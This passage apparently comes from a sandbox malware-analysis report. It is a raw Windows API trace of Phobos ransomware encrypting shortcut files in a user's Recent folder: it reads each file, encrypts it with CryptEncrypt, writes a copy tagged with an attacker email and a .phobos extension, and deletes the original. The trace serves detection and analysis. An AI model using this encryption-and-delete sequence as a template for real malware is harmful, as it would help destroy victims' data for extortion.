HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.241] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.241] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.241] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.242] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23e, lpOverlapped=0x0) returned 1 [0201.242] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x240, dwBufLen=0x240 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x240) returned 1 [0201.242] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x240, lpOverlapped=0x0) returned 1 [0201.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.243] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.243] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.243] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.243] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.243] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.243] CloseHandle (hObject=0x124) returned 1 [0201.243] CloseHandle (hObject=0x178) returned 1 [0201.243] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk")) returned 1 [0201.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.245] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2476) returned 1 [0201.245] CloseHandle (hObject=0x178) returned 1 [0201.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk")) returned 0x20 [0201.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.245] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.245] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.246] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.246] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9ac, lpOverlapped=0x0) returned 1 [0201.247] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0) returned 1 [0201.247] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9b0, lpOverlapped=0x0) returned 1 [0201.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.248] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.248] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.248] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.248] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.249] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.249] CloseHandle (hObject=0x178) returned 1 [0201.249] CloseHandle (hObject=0x124) returned 1 [0201.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oyrwfs.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oyrwfs.mkv.lnk")) returned 1 [0201.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.250] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=489) returned 1 [0201.250] CloseHandle (hObject=0x124) returned 1 [0201.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk")) returned 0x20 [0201.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.251] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.251] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.251] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.251] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1e9, lpOverlapped=0x0) returned 1 [0201.252] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0, dwBufLen=0x1f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0) returned 1 [0201.252] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1f0, lpOverlapped=0x0) returned 1 [0201.253] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.253] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.253] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.253] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.253] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.253] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.253] CloseHandle (hObject=0x124) returned 1 [0201.253] CloseHandle (hObject=0x178) returned 1 [0201.254] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OZnEXi rpCg2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oznexi rpcg2.lnk")) returned 1 [0201.254] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.255] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2648) returned 1 [0201.255] CloseHandle (hObject=0x178) returned 1 [0201.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk")) returned 0x20 [0201.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.256] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.256] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.257] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.257] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.257] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa58, lpOverlapped=0x0) returned 1 [0201.258] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa60, dwBufLen=0xa60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa60) returned 1 [0201.258] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa60, lpOverlapped=0x0) returned 1 [0201.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.259] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.259] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.259] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.259] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.259] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.259] CloseHandle (hObject=0x178) returned 1 [0201.259] CloseHandle (hObject=0x124) returned 1 [0201.259] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pPD wlVxvT9yO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ppd wlvxvt9yo.lnk")) returned 1 [0201.260] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.260] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=783) returned 1 [0201.261] CloseHandle (hObject=0x124) returned 1 [0201.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk")) returned 0x20 [0201.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.261] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.261] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.261] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.261] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.262] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x30f, lpOverlapped=0x0) returned 1 [0201.263] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x310, dwBufLen=0x310 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x310) returned 1 [0201.263] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x310, lpOverlapped=0x0) returned 1 [0201.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.263] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.263] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.263] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.264] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.264] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.264] CloseHandle (hObject=0x124) returned 1 [0201.264] CloseHandle (hObject=0x178) returned 1 [0201.264] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Px2oRZW0ju4eRHrT4Mm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\px2orzw0ju4erhrt4mm.lnk")) returned 1 [0201.265] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.265] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3668) returned 1 [0201.265] CloseHandle (hObject=0x178) returned 1 [0201.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qDCtLouEPjR9.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qdctlouepjr9.flv.lnk")) returned 0x20 [0201.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 